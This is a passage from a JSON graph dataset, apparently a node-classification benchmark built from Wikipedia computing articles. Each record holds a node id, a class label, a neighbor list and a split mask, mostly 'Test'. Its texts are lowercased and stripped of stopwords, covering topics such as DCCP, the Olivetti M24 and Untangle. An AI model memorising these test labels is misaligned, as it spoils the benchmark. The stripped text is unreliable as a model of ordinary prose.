      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      9451,
      11000,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      7488,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      4490,
      10126,
      7572,
      5026,
      4013,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 560,
    "label": 1,
    "text": "The_Plant_List:plant list plant list list botanical names species plants created royal botanic gardens kew missouri botanical garden launched 2010 intended comprehensive record known names plant species time produced response target 1 2002-2010 global strategy plant conservation gsp c updated since 2013 superseded world flora online october 2012 follow-up project world flora online launched aim publish online flora known plants 2020 developed collaborative group institutions around world response 2011-2020 gspc ’ updated target 1 aims achieve online flora known plants 2020 complementary project called international plant names index kew also involved ipni aims provide details publication aim determine accepted species names newly published names automatically added ipni world checklist selected plant families database underlies plant list plant list 1,064,035 scientific plant names species rank 350,699 accepted species names belonging 642 plant families 17,020 plant genera plant list accepts approximately 350,699 unique species 470,624 synonyms species suggests many species referred one name plant list determined another 243,000 names unresolved meaning botanists far unable determine whether separate species duplication 350,699 unique species plant list launched 2010 international year biodiversity attracted media attention comprehensive approach fox news highlighted number synonyms encountered suggesting reflected surprising lack biodiversity earth plant list also attracted attention building work english naturalist charles darwin 1880s started plant list called index kewensis ik kew added average 6,000 species every year since ik first published 400,000 names species however ik 1913 avoided making taxonomic judgement citations currently run part ipni rather plant list",
    "neighbors": [
      1227,
      6571,
      10513,
      6580,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 561,
    "label": 3,
    "text": "RedSleeve:redsleeve redsleeve free operating system distribution based upon linux kernel derived red hat enterprise linux rhel distribution ported arm architecture redsleeve derived free open source software made available red hat inc. produced maintained supported red hat specifically product built source code red hat enterprise linux versions terms conditions red hat enterprise linux eula gnu general public license name redsleeve chosen makes intuitively obvious upstream distribution derived time implying arm platform sleeves covering arms redsleeve different red hat enterprise linux derivatives centos scientific linux also port new platform arm supported upstream distribution first official alpha release made available february 12 2012 redsleeve aims maintain equal versioning upstream distribution terms distribution release numbering individual package release numbering exception packages modified upstream release done order either remove upstream branding required upstream distributions terms conditions order apply additional patches required make package build work arm architecture time writing upstream distribution support cases .0 appended package version distribution tag redsleeve linux 6 covered register may 29 2012",
    "neighbors": [
      2375,
      5096,
      6055,
      2955,
      5067,
      6380,
      5742,
      7983,
      9455,
      7483,
      9964,
      5363,
      5397,
      2134,
      823,
      1849,
      59
    ],
    "mask": "Test"
  },
  {
    "node_id": 562,
    "label": 5,
    "text": "Datagram_Congestion_Control_Protocol:datagram congestion control protocol computer networking datagram congestion control protocol dccp message-oriented transport layer protocol dccp implements reliable connection setup teardown explicit congestion notification ecn congestion control feature negotiation ietf published dccp proposed standard march 2006. provides introduction dccp provides way gain access congestion-control mechanisms without implement application layer allows flow-based semantics like transmission control protocol tcp provide reliable in-order delivery sequenced delivery within multiple streams stream control transmission protocol sctp available dccp dccp connection contains acknowledgment traffic well data traffic acknowledgments inform sender whether packets arrived whether marked explicit congestion notification ecn acknowledgements transmitted reliably congestion control mechanism use requires possibly completely reliably dccp useful applications timing constraints delivery data applications include streaming media multiplayer online games internet telephony applications old messages quickly become useless getting new messages preferred resending lost messages applications often either settled tcp used user datagram protocol udp implemented congestion-control mechanisms congestion control useful applications dccp also serve general congestion-control mechanism udp-based applications adding needed mechanisms reliable in-order delivery top udp/dccp context dccp allows use different generally tcp-friendly congestion-control mechanisms dccp option long 48-bit sequence numbers corresponding packet id rather byte id tcp long length sequence numbers aims guard blind attacks injection dccp-resets connection following operating systems implement dccp userspace library dccp generic header takes different forms depending value x extended sequence numbers bit x one sequence number field 48 bits long generic header takes 16 bytes follows x zero low 24 bits sequence number transmitted generic header 12 bytes long",
    "neighbors": [
      10242,
      1030,
      3592,
      8211,
      6681,
      6682,
      10270,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      1586,
      9269,
      11321,
      3133,
      4158,
      5181,
      6723,
      11332,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      9860,
      649,
      9868,
      2701,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      6319,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      5875,
      3322,
      9987,
      3847,
      1297,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      823,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      891,
      6524,
      2431,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      5071,
      8669,
      8670,
      10723,
      10727,
      3564,
      4589,
      5102,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 563,
    "label": 3,
    "text": "Olivetti_M24:olivetti m24 olivetti m24 computer sold olivetti 1983 using intel 8086 cpu system sold united states original name docutel/olivetti dallas xerox bought rights rebadge system pc 6300 xerox 6060 series respectively owned 25 olivetti around time 6300 launched june 1984 first attempt compete pc compatible market contrary pc clones era m24 highly compatible ibm pc one characteristics use powerful 8.0 mhz intel 8086 cpu rather 4.77 mhz intel 8088 used ibm pc xt configured maximum mode allowed direct installation 8087 math co-processor also 8 mhz motherboard cpu clock along others machine serial baud rate generator ibm-standard 14.3 mhz crystal used expansion board divided 24.0 mhz master crystal cpu timing particular using intel 8284 clock generator per ibm pc produce 33 duty cycle squarewave required 8086 system designed split-level motherboard screwed onto underside computer case connected isa bus backplane top section case via video card rather occupying isa slot two female edge connectors plugs onto ends motherboard backplane doubling bridge m24 seven 8-bit isa slots standard time number slots exact figure seeming vary one least four across extant machines proprietary second connectors accept olivetti-specific 16-bit cards machine bad luck launching months ibm pc-at introduced entirely different 16-bit connector signalling standard extension pc bus known simply isa ended featuring slots incompatible three fronts physical configuration complement arrangement signals data transfer rate significantly restricting number compatible 16-bit cards produced initial release 6300 either one two 360k 5.25 floppy drives hard disk offered 1986 began offering 3.5 720k floppies 20mb hard disks xerox 6060 came standard single 360k 5.25 drive 20mb hard drive iomega bernoulli 10/10 removable cartridge drive also offered factory option well small expansion sidecar hosting hard drive users found internal space left floppies expansion cards 6300s made 1986-1987 bios version 1.43 added proper support 3.5 floppies fixed number bugs contemporary systems bios upgrade required physical chip replacement provided 35 m24/6300 unusual enhanced 32 kib cga-compatible video card addition standard 200-line cga graphics modes automatically line doubled transparent software text modes also using 400 scanlines higher quality 8x16 pixel fonts even 16x16 40-column mode expansion rom also supported additional 640x400 pixel graphics mode well poorly documented 512x256 mode compatibility earlier m20 model conjunction z8000-based emulator card included necessary additional clock source modes non-interlaced albeit running then-common 50 hz vsync rate required dedicated oem 26.3 khz 12 monitor either colour multi-level monochrome comparatively high line frequency m20 mode using 24 mhz system master crystal drive pixel clock either directly 320x200 8x16 40-character divided two comparison contemporary ibm displays ran 15.8 21.9 khz 14.3 16.3 mhz dot clocks colour depth remained standard fixed 4-colour cga palettes 320x200 monochrome higher modes selectable rgb foreground colour/one 15 shades fixed black background could expanded 4 8 colours/greyscales resolutions 16 512x256 addition graphics memory expansion board holding 32 96 kib ram resolution colour relationship unintuitive due crtc bandwidth addressing limitations 16 colours 640-pixel modes effectively combined standard expansion memory spaces single 64-bit wide bank expansion card also monitor port built allowing native dual-monitor support cga compatibility necessarily limited rgb modes well behaved software used bios-preset modes n't attempt much clever direct reprogramming crtc registers including setting pseudo-text hack modes like 160x100 16 colours composite video output available although basic register settings remained others necessarily different line doubling trickery type crtc hack altered scan rates olivetti protective scrambler chip attempted convert custom settings nearest safe equivalents could go far turn machine headline 640x400 graphics mode received moderate level support software developers mostly serious applications lotus 1-2-3 symphony earl weaver baseball however example game use time supported emulated well extended e.g 752x410 various super ega mode monitor cards ati ega wonder well replacement video card could used 6300 long designed work either specifically machine high speed 16-bit cards ibm pc compatible mode necessarily 8-bit 4.77 mhz however original graphics card remain place even longer use formed essential part bridge connecting expansion board motherboard although featured dip switch jumpers select mda/hercules 40 80 column cga expanded video options including per ibm motherboard settings disable switch instead socketed motorola hd6845 crtc main controller chip removed replaced simple remarkably expensive bridging circuit user installed set jumper wires correct half-dozen socket terminals bypass necessary bus signals card untouched plasma-screen early lcd based portables compaq manufacturers also copied m24/6300 graphics hardware make better use early square-pixel 640x400 panels popular japanese non-ibm portables still well suited basic cga/ega resolutions much ega-high mda/ega text unable show mcga/vga-high hercules graphics without cropping losing details ibm compatible hardware ecosystem otherwise avoided mode however remained whole poorly supported oddity much like ibm pgc super egas outside limited library applications direct driver support pc graphics whole exceed 640x350 16 colours 720x348 monochrome arrival vga standard windows 3.0 provided simple one-driver-for-all-programs framework future expansion cards build keyboard used proprietary 9-pin d-sub connector built system board unusual option plugging mouse keyboard via another 9-pin d-sub connector mouse could configured simulate usage keyboard arrow keys dos applications without mouse support aided choice parallel quadrature encoding design per microsoft bus mouse amiga atari st mice modified work 6300 instead latterly common 9-pin serial transmission europe olivetti also launched 10.0 mhz version olivetti m24 sp announced november 1985 contender title highest clocked 8086 computer processor fastest grade 8086-2 rated maximum speed exactly 10.0 mhz support motherboard featured switchable 24/30 mhz master crystal still divided 3 produce 33 duty cpu clock additional 4 mhz crystal maintain clock signal peripherals required video board receiving 24 mhz crystal maintain image size scan frequencies processor speeds january 1985 review infoworld declared fair performer better 8088-equipped ibm pc pc xt equal 8086-based compaq deskpro taking pricing account concluded good deal means perfect reviewer wondered 5 mhz 8086 compaq ran fast processor 8 mhz machine however appears misunderstanding given compaq switchable guaranteed ibm pc-compatible 4.77 mhz enhanced-performance 7.16 mhz clock rate respectively one-third one-half ntsc colourburst crystal used ibm olivetti/at defaulted latter boot detailed publications time endlessly misreported including 8 mhz frequently miscalculated 7.14 mhz ever since reason behind m24/6300 failure perform better equal 1/9th-slower deskpro may traceable hinted infoworld review poorly optimised graphics routines bios would particularly noticeable effect high resolution 640x400 extended colour modes november 1985 review pc magazine hard drive-equipped version found par 6 mhz 80286 equipped ibm pc far processor performance concerned considerably slower i/o initial model 6300 hard disk 360k floppy slow sales 1984 28,500 sold compared 1.5 million ibm pcs sales much better first three months 1985 8,500 sold time period fact worldwide sales olivetti m24 42,000 first year well planned production capacity 200,000 result introduced faster models hard drive math co-processor march still one year market claimed 1 pc market par televideo columbia data products well compaq kaypro december 1986 however pc line including 6300 plus described put fourth place terms market share us olivetti m24 much better europe became market leader 1986 company produced almost half million m24 machines year 200,000 went united states claimed crown pc machines sold europe year olivetti also became third largest pc manufacturer worldwide olivetti would however unable repeat feat subsequent years 1986 represents company apogee terms pc market share 6300 also supported unix-based operating systems particularly venix/86 encore released september 1984 version xenix adapted machine santa cruz operation announced june 1985 october 1985 launched 6300 plus used 6 mhz 286 microprocessor case 6300 hardware level machine criticized infoworld reviewer incompatible cards hand sold package 6300 plus bundled simultask ran ms-dos unix system v simultaneously cost—with software licenses included—on par ibm pc ms-dos alone review pc magazine declared 6300 plus flat better machine compared ibm pc version simultask included machine based locus computing corporation merge software according 6300 plus used non-standard hardware make feat possible given limitations 80286 pc6300 plus shipped ms-dos 1985 though unix system v distribution would ready end march 1986 6300 plus sell well original 6300 forrester research estimated december 1986 financial losses pc market 600m year 6300 plus announced turning production development pc products olivetti 1987 offered true at-based 286 6310—a rebadge olivetti m28 equipped one-wait state 8 mhz processor pretty slow machine class even slower ibm xt 286 simultask also option 6310 later-released 6312 addressed speed problem 12-mhz cpu announcement 6310 april 1987 announced price cuts across 6300 pc product line 6300 plus discounted 27-38 original 6300 discounted 17-23 depending configuration response ibm launch ps/2 line olivetti revamped product line july 1987 include 3.5 floppy drives 5.25-to-3.5 converted bays though also introduced new 386-based products m24 m24 sp succeed m240 8086 10 mhz marketed usa 6300 wgs m28 m28 sp succeed m280 80286 12 mhz olivetti also introduced m380 series tower desktop using 80386 processor",
    "neighbors": [
      640,
      6787,
      10692,
      6378,
      1324,
      8301,
      7983,
      1776,
      6129,
      2995,
      2745,
      3323,
      5756
    ],
    "mask": "Test"
  },
  {
    "node_id": 564,
    "label": 9,
    "text": "Yukihiro_Matsumoto:yukihiro matsumoto matsumoto chief architect ruby heroku online cloud platform-as-a-service san francisco fellow rakuten institute technology research development organisation rakuten inc appointed role technical advisor vasily inc. starting june 2014 born osaka prefecture japan raised tottori prefecture age four according interview conducted japan inc. self-taught programmer end high school graduated information science degree university tsukuba member ikuo nakata research lab programming languages compilers works japanese open source company netlab.jp matsumoto known one open source evangelists japan released several open source products including cmail emacs-based mail user agent written entirely emacs lisp ruby first piece software become known outside japan matsumoto released first version ruby programming language 21 december 1995 still leads development language reference implementation mri matz ruby interpreter april 2012 matsumoto open-sourced work new implementation ruby called mruby minimal implementation based virtual machine called ritevm designed allow software developers embed ruby programs keeping memory footprint small performance optimised december 2014 matsumoto open-sourced work new scripting language called streem concurrent language based programming model similar shell influences ruby erlang functional programming languages matsumoto listed investor treasure data many company programs fluentd use ruby primary language matsumoto married four children member church jesus christ latter-day saints standard service missionary counselor bishopric church ward",
    "neighbors": [
      7430,
      9229,
      2191,
      7695,
      10771,
      7325,
      9245,
      1952,
      8495,
      9780,
      4277,
      5945,
      1852,
      5567,
      6338,
      8262,
      11208,
      5578,
      3675,
      10973,
      1379,
      11625,
      8554,
      2804,
      8057,
      1789
    ],
    "mask": "Test"
  },
  {
    "node_id": 565,
    "label": 3,
    "text": "Virtual_legacy_wires:virtual legacy wires virtual legacy wires vlw transactions interconnect fabric replaced particular set physical legacy pins intel microprocessors legacy wires replaced include intr a20m smi legacy signals",
    "neighbors": [
      7377
    ],
    "mask": "Test"
  },
  {
    "node_id": 566,
    "label": 2,
    "text": "Soft_reference:soft reference soft reference reference garbage-collected less aggressively soft reference one strengths levels 'non strong reference defined java programming language others weak phantom order strongest weakest strong soft weak phantom soft references behave almost identically weak references soft weak references provide two quasi-priorities non-strongly referenced objects garbage collector always collect weakly referenced objects collect softly referenced objects algorithms decide memory low enough warrant soft references may used example write free memory sensitive cache cached objects kept enough heap space cases weakly referenced objects may reclaimed quickly make cache useful",
    "neighbors": [
      2304,
      2339,
      8262,
      5677,
      10684,
      572,
      541
    ],
    "mask": "Test"
  },
  {
    "node_id": 567,
    "label": 0,
    "text": "Google_Translator_Toolkit:google translator toolkit google translator toolkit web application designed allow translators edit translations google translate automatically generates google translator toolkit translators organize work use shared translations glossaries translation memories upload translate microsoft word documents opendocument rtf html text wikipedia articles google translator toolkit supported google translate web-based translation service google translator toolkit configured automatically pre-translate uploaded documents using google translate google translator toolkit released google inc. june 8 2009 product expected named google translation center announced august 2008 however google translation toolkit turned less ambitious product document rather project-based intended process management package simply another personal translation memory tool google claims google translator toolkit part effort make information universally accessible translation helps translators translate better quickly one shared innovative translation technology originally google translator toolkit meant attract collaboratively-minded people translate wikipedia entries material non-governmental organizations however nowadays also widely used commercial translation projects significance google translator toolkit position fully online software-as-a-service saas mainstreams backend enterprise features hitherto fringe innovations presaging radical change translation performed starting one source language – english 47 target languages june 2009 google translator toolkit supports 100,000 language pairs translator toolkit translate 345 source languages 345 target languages march 6 2017 google translator toolkit user interface available 37 languages bulgarian catalan chinese simplified chinese traditional taiwan croatian czech danish dutch english filipino finnish french german greek hindi hungarian indonesian italian japanese korean latvian lithuanian norwegian polish portuguese brazil portuguese portugal romanian russian serbian slovak slovenian spanish swedish thai turkish ukrainian vietnamese workflow google translator toolkit described follows first users upload file desktop enter url web page wikipedia article want translate google translator toolkit automatically 'pretranslates document divides document segments usually sentences headers bullets next searches available translation databases previous human translations segment previous human translations segment exist google translator toolkit picks highest-ranked search result 'pretranslates segment translation previous human translation segment exists uses machine translation produce 'automatic translation segment without intervention human translators users work reviewing improving automatic translation click sentence fix translation use google ‘ translation tools help translate clicking show toolkit button using toolkit view translations previously entered users translation search results tab use dictionary tab search right translations hard-to-find words addition translators use features like custom multi-lingual glossaries view machine translation reference also share translations friends clicking share button inviting help edit view translation finished download translation desktop wikipedia articles easily publish back source pages google translator toolkit provides api currently restricted approved users",
    "neighbors": [
      6655
    ],
    "mask": "None"
  },
  {
    "node_id": 568,
    "label": 3,
    "text": "Emerald_Dragon:emerald dragon game utilises top-down overhead perspective players move controllable character two dimensions player moves around world map may encounter battles turn-based time point system movements attacks sap bar top screen character turn ends bar depleted role-playing game experience points collected defeating enemies used level-up playable characters main protagonist atorushan stronger attacks made available key items collected game called emerald graces transform dragon unleash powerful attack cost reducing hp used long time ago dragons humans lived peace land ishbahn lord tiridates believing existence dragons among humans defiles ishbahn places curse kills dragons area dragons collectively called dragon tribe manage escape find refuge draguria dimensional rift prevents humans crossing start game ship wrecks coast draguria protagonist dragon tribe youth named atorushan seeks friendship sole survivor human girl named tamryn white dragon leader tribe girl nurtured dragons land 12 years later leaves wants find happiness kind atorushan breaks left horn gives means summoning need assistance 3 years incident atorushan called white dragon aforementioned horn blown granting silver scale keep perishing curse ishbahn white dragon sends tend tamryn upon arriving atorushan learns entirety ishbahn attack evil armies controlled tiridates stop remove land curse needs find 5 emerald graces dragon-based treasures scattered around land resurrect emerald dragon greatest dragons destined bring miracle akihiro kimura successfully crowdfunded sequel audio series titled elemental dragoon 2015 based ideas proposed sequel emerald dragon back 1990s never got ground due apparent copyright issues though kimura others made several independent dōjinshi novels continuing story years series designed get around copyright issues focusing new characters slightly changing names title though original characters appear end hopefully allow akihiro kimura generate interest true sequel emerald dragon regain copyright emerald dragon maintains score 3.59/5 50 votes gamefaqs website july 2019 youtubers reviewed game given positive rating youtuber snes drunk said game would n't think emerald dragon among ranks best role playing games snes offer certainly worthwhile play want scratch jrpg itch 5:00-5:08 youtuber avalanche reviews commented english fan translation super nintendo version aside novelty recently translated japanese rpg emerald dragon also interesting stab changing traditional rpg format small effective ways 've grown tired slim pickings westerners awarded rpg department emerald dragon may exactly 're looking amazing example genre accomplish fun different well written change pace ultimately well worth time 6:30-6:56",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 569,
    "label": 4,
    "text": "Untangle:untangle untangle subsidiary providence strategic growth based san jose california provides network management software untangle ng firewall used nearly 40,000 organizations worldwide untangle founded 2003 metavize inc. john irwin dirk morris 2006 metavize raised 10.5m series-a venture funding round cmea ventures rustic canyon partners named bob walters ceo renamed untangle inc 2007 untangle released untangle gateway platform open source gplv2 license october 2009 untangle released untangle 7.0 included improvements reporting capabilities december 2009 untangle released untangle 7.1 included improvements web filtering policy management applications march 2010 untangle released untangle 7.2 included captive portal application untangle released free bookmark utility called saveface may 2010 response continued loosening default privacy settings facebook user accounts june 2010 untangle released untangle 7.3 enabling company software used oem hardware manufacturers produce branded multi-function firewalls utm appliances august 2010 untangle released untangle 7.4 wherein simplified packages lite standard premium november 2010 untangle released untangle 8.0 included bandwidth control february 2011 untangle released untangle 8.1 included web cache untangle 9.0 released later 2011 included ipsec vpn support february 2012 untangle released untangle 9.2 included application control application control allows users block flag tarpit applications protocols greater degree control administrators create custom rules proprietary integrated rules engine ire target complex traffic patterns march 2012 untangle released new appliance line answering request customers easier way deploy untangle certified hardware april 2012 untangle changed content standard package include ipsec vpn application control august 2012 untangle released untangle 9.3 including full tunnel openvpn january 2013 untangle released untangle 9.4 including all-new captive portal work integrated rules engine ire allowing varied use cases like mobile device management bring device byod environments integration payment providers support paid access wi-fi hotspots separate policies wi-fi wired users changes included improved session viewer new host table view september 2013 untangle released untangle 10.0 including https inspector new app allows untangle inspect traffic https allows https traffic scanned full suite untangle applications allow rules applied improvements include ipv6 configurability 802.1q tagged alias vlan tagging support simpler powerful nat implementation better pppoe support october 1 2013 untangle acquired cymphonix corporation internet management network appliance company december 5 2013 untangle acquired assets esoft utm firewall company january 2014 untangle renamed untangle product untangle next generation ng firewall also introduced new product line untangle internet content ic control february 2014 untangle released untangle ng firewall version 10.1 featuring high availability april 2014 untangle changed name lite package free premium package complete also retired standard package april 21 2014 untangle acquired consumer end point protection division total defense september 12 2016 untangle announced acquired providence strategic growth unit providence equity partners untangle also announced new ceo scott devens untangle applications include anti-spam content filtering antivirus anti-phishing anti-spyware intrusion prevention firewall openvpn router web cache software untangle ng firewall platform free applications released version 2 gnu general public license gpl many components gnu classpath exception certain third-party components distributed untangle software licensed free license terms complete package proprietary eula",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      1273,
      6797,
      9488,
      1172,
      3732,
      8343,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      939,
      1708,
      3243,
      3885,
      8753,
      2228,
      823,
      11577,
      5178,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3941,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1529,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 570,
    "label": 6,
    "text": "3+Share:3+share 3+share also known simply 3+ 3 plus pioneering file print sharing product 3com introduced early 1980s 3+share competitive novell netware network server business throughout 1980s replaced joint microsoft-3com lan manager 1990 3com exited server market 1991 1984 microsoft announced ms-net framework building multitasking network servers ran top single-tasking ms-dos ms-net implemented basic services file print sharing left actual networking protocol stack favor virtual system form ibm netbios vendors like 3com licensed ms-net system added device drivers parts protocol stack implement complete server system case 3+share 3com based networking solution seminal xerox network systems xns 3com ceo robert metcalfe helped design xns provided networking protocol well connections underlying ethernet hardware ran metcalf also helped design also modified ms-net servers produce called ethershare etherprint protocols could accessed ms-dos computer ms-net client software installed internally 3+share network stack file print server modules disk caching user handling running simultaneously inside dos memory space limited pc memory map 3+share could support megabyte flat memory breaking x86 pc 640 kbyte barrier large amount ram time later added xns name service mapped network addresses human-readable names allowed users look devices looking strings like 3rd floor printer name services part ibm-created netbios ms-net microsoft left commands server common 3rd party implementations like 3+ add sorts services back significant problem name service entries could synchronized departmental enterprise deployments 3com soon partnered 3+share dedicated server hardware called 3server combination seen first network-attached storage system 3com microsoft jointly developed lan manager 2.0 successor 3+share product introduced 1990 3com soon lost interest network software market handing lan manager product called 3+open well intellectual property microsoft 1991 work absorbed microsoft ibm server message block protocol still used today 3+share client drivers uses less memory corresponding ones lan manager 3+share uses primitive security mechanism client security level access stored client ram simply changing one byte complete control entire system gained security flaw known manufacturer time product market corrected client utilities",
    "neighbors": [
      2345,
      9194,
      9166,
      2383,
      499,
      3477,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 571,
    "label": 4,
    "text": "Fabric_of_Security:fabric security fabric security also known cyber security fabric federated security refers systems designed protect information systems infrastructure home corporation government malicious attackers protection sense means guaranteeing confidentiality integrity availability information stored system system elements components unlike endpoint security network security web application security internet security fabric security systems assume attacks successful averted therefore emphasis shifts attempting prevent unauthorized access minimizing time detect unauthorized access time isolate unauthorized access harm finally time remove offending process reconfiguration system back safe state security refers processes systems designed protect assets individual system and/or organization harm computer security aka cyber security refers processes systems designed protect computer and/or information system assets harm general assets 1 information/ data 2 programs applications 3 services protecting assets harm means confidentiality – assets used/access authorized parties also refer secrecy privacy integrity – assets modified authorized parties authorize ways “ insider threat ” availability – assets available authorize parties time 1971 butler lampson classical paper protection introduced general model protection computer information system assets withstood passage time enlarge protection systems implemented date follow lampson original formulation shown figure 1 entitled access control model protection fundamentally universe divided two classes principals access resources resource object protection policy established access objects restricted via protection system called reference monitor implements protection policies system namely reference monitor guard system must 1 identifies identity principal claiming access object principal 2 authentication validates principal claiming access object he/she/it claims say 3 authorization principal claiming access object authorized access said object past protection model organizations applied protect infrastructure simply everything kitchen sink model—meaning add devices protect enterprise network perimeter trusted zone add devices protect mobile device add devices protect database essence model simply advocated accumulation security devices pointed earlier see section 1.0 model failed addition idea cyber-attacks stopped periphery network become fool errand today circa 2020 computing environment cyber-threat landscape individuals well corporations recognized fact threats often distributed nature time space making detection extremely difficult ii working assumption prevent infections goal 100 prevention longer practical rather given system compromised quickly detect breach minimize impact event future basis competition security products services ability provide early warnings execute countermeasures minimize damage cyber-attackers problem single even multiple independent security devices providing amount absolute protection rather information security products services need correlated scrutinized transformed wide-angle actionable information order minimize likely threats damage cyber-attackers specific enterprise environment see figure 3 call approach “ fabric security. ” layered model easily accommodates distributed deployment security multi-vendor environments 2013 wireless systems security research laboratory wssrl started development first-reference implementation fabric security called fosa purpose fosa use proven techniques areas distributed processing computer architecture clustering algorithms build viable real-time security system capable protecting corporate infrastructure circa 2020 computing model fosa intended first implementation fabric security architecture time remedying limitations current security system implementations specifically stated goal design avoid stand-alone solutions incorporating ability deal reliability issues meaning best security product/solution good either fails operate specified fault tolerant and/or compromised attacker resilient attacks must able withstand attacks directly able protect compromised disabled section provide brief overview fosa system major components however manuscript cover reliability adaptability elements architecture use byzantine agreement see 4 build resiliency system architecture fosa shown figure 4 fosa distributed system based layer component architecture fosa node set components hierarchical structure provide traditional security functions found implementations lowest level hierarchy layer0 find traditional data gathering component sensors/probes unlike systems sensors fosa custom data collectors simply gather data security systems firewalls av systems latter case sensors gather data monitoring output variety systems outputs snort syslog file linux data collected sensors serve input next layer hierarchy layer1 s-event generator seg segs function data abstraction layer collect data sensors filter convert platform independent format provide aggregated filtered data next layer hierarchy secure host manager shm form events events queued analysis shm addition segs start stop sensors context shm consider local ids/ips makes decisions activities monitors host- network-based critical component shm analysis engine ae ae retrieves events event queue processes makes final determination probability successful attack launched and/or attack progress local level probability falls one three ranges 0 ≤ p attack progress compromise occurred ≤ φ1 attack br φ1 ≤ p attack progress compromise occurred ≤ φ2 insufficient data local level make decision addition situations indication local node compromised. br φ2 ≤ p attack progress compromise occurred attack detected first case shm sure events processed represent attack elements attack therefore system continues operation without actions however next two cases potential attack taken place progress case shm immediately initiates countermeasures first stop processing events disable remote access node notify next level hierarchy distributed threat intelligence manager/engine dtim potential failure attack making case shm sure host compromised shm also sends “ last gasp ” message dtim sends “ last gasp ” message shm stops segs stops processing data segs launches countermeasures restore node healthy state 2.1.2 distributed threat intelligence manager/engine dtim previously mentioned fosa real-time distributed system based concept autonomous agents structure similar architecture proposed aafid system however differs least three significant ways architecture distributed threat intelligence engine/manager dtim consists two major components 1 distributed trust manager dtm performs critical functions fault tolerance attack resilience 2 distributed threat intelligence correlation engine tice performs function threat event detection globally 2.1.2.1 distributed trust manager dtm dtm performs several essential functions creation trust domain formation initial group discussed previous work see 2 detail however nodes compromised status change time dtim must capability expelling members reconfiguring process reconfiguration initiated either receipt “ last gasp ” message member dtm reconfiguration timer expires basic process works follows upon receipt “ last gasp ” message every node trust domain initiate reconfiguration • sending set test patterns node suspected compromised test pattern matrix consists set known intrusion vectors well set non-intrusion patterns upon formation initial group every time membership trusted domain changes matrix reconstituted distributed among members matrix distributed way single member group members colluding long k k n-1 2 k number colluding members complete knowledge test patterns 2.1.2.2 distributed trust manager component dtim fosa- abstract model one key components distributed threat intelligence manager/engine distributed trust manager dtm dtm built upon principles replication consensus ” wisdom crowds. ” order understand behaviors fosa system important abstract model trust domain td presented present model let c cnew p x α abstract representation trust domain model allows us reason correctness dtm component threat intelligence/engine one potential side benefit model allow us identify holes design basic components model c p x α defined c c1 c2 c3 ... cn finite integer n set nodes trust domain node within context security device collecting data making decisions possibility attack n could large practical purposes associated implementation dtm limit n 16. cnew cj |cj ∈/ c node trying join trust domain state w cnew unknown time cnew declares intention join trust domain cnew may node whose behavior accordance trust domain admission security policies “ uncompromised node ” may compromised α α1 α2 α3 ... αm set actions node may perform node essentially deterministic finite automaton thus finite set states finite set input symbols transition function 3 transition function analogous set actions node may take based input node receives since input alphabet finite number states finite set actions α node may take finite p p1 p2 p3 ... pk security policy describes acceptable behaviors security device trust domain pi rule composed subject object action subject may perform object note security policies rarely defined completely difficult list every possible rule acceptable thus accept add new rules policy new acceptable actions node may perform object discovered clear p ⊆ α also note ¬p ∪ p α. x capability matrix indicates actions subjects perform objects and/or subjects nodes objects data services running nodes xij represents actions subject subjecti perform object objectj words object oj computer nodek xij gives set actions αl ∈ α computer nodek execute behalf subjecti object 0j using model defined capability policy matrix experimental trust domain see figure 5 corresponding security policy p p1 p2 p3 ... pk 2.1.2.3 security policy define several variables constants necessary define security policy p. variables osi =the current operating version nodei fosai fosa software version nodei responsei x response nodei gives nodex td interrogated opinioni x belief nodex td whether nodei compromised majorityi x majority belief nodes td whether nodei com- promised parallel signed message algorithm completed messagetamperedi whether messagei tampered constants present security policy ost minimum acceptable o/s version node join td fosat minimum acceptable version fosa software responsec correct response node interrogation compromised majority belief node trying join td compromised uncompromised= majority belief node trying join td safe using model defined capability policy matrix experimental trust domain see figure 5 corresponding security policy p p1 p2 p3 ... pk defined based definitions security policy described follows p1 given node ci ∈ cnew attempting join td value osi ost ci allowed join td br p2 given node ci ∈ cnew attempting join td value safei safet ci allowed join td br p3 given node ci ∈ cnew attempting join td node cx td value responsei x responsec opinioni x compromised br p4 given node ci ∈ cnew attempting join td node cx td value responsei x responsec opinioni x uncompromised br p5 given set nodes c1 ... cx td node ci td majorityi x compromised cx open socket connection ci preventing ci join td br p6 given set nodes c1 ... cx td node ci td majorityi x uncompromised cx opens socket connection ci thus allowing ci join td br p7 given nodes cx cy nodes td cx receives messagei cy messagetamperedi rue cx discards messagei never received 2.1.3 threat intelligence correlation engine tice tice threat intelligence correlation engine global engine whose inputs events generated shm module lower level hierarchy local 